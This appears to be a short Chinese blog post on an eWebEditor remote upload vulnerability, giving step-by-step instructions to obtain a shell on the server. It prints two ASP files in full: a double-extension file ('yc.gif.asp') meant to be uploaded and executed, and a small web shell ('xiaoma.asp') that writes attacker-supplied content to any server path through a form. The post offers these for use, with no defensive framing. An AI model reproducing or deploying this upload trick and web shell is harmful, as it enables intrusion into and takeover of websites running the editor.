ewebeditor远程上传漏洞

有人说通杀,有人说2.8以后……

远程上传时执行代码
导致get shell
1.把yc.gif.asp   xiaoma.ASa放在同一目录下(本地的)

——————————————远程文件(yc.gif.asp)——————————————————

  
  
  
  
  1. <
  2. Set fs = CreateObject("Scripting.FileSystemObject") 
  3. Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),1,false,0) 
  4. Thetext=MyTextStream.ReadAll 
  5. response.write thetext 
  6. %> 

——————————————小马(xiaoma.asp)——————————————

  
  
  
  
  1. <%on error resume next%> 
  2. <%ofso="scripting.filesystemobject"%> 
  3. <%set fso=server.createobject(ofso)%> 
  4. <%path=request("path")%> 
  5. <%if path<>"" then%> 
  6. <%data=request("dama")%> 
  7. <%set dama=fso.createtextfile(path,true)%> 
  8. <%dama.write data%> 
  9. <%if err=0 then%> 
  10. <%="success"%> 
  11. <%else%> 
  12. <%="false"%> 
  13. <%end if%> 
  14. <%err.clear%> 
  15. <%end if%> 
  16. <%dama.close%> 
  17. <%set dama=nothing%> 
  18. <%set fos=nothing%> 
  19. <%="<form action=" method=post>"%> 
  20. <%="<input type=text name=path>"%> 
  21. <%="<br>"%> 
  22. <%=server.mappath(request.servervariables("script_name"))%> 
  23. <%="<br>"%> 
  24. <%=""%> 
  25. <%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%> 
  26. <%="<br>"%> 
  27. <%="<input type=submit value=save>"%> 
  28. <%="</form>"%> 

2.远程上传yc.gif.asp
会自动执行脚本,上次小马。

你可能感兴趣的:(职场,休闲)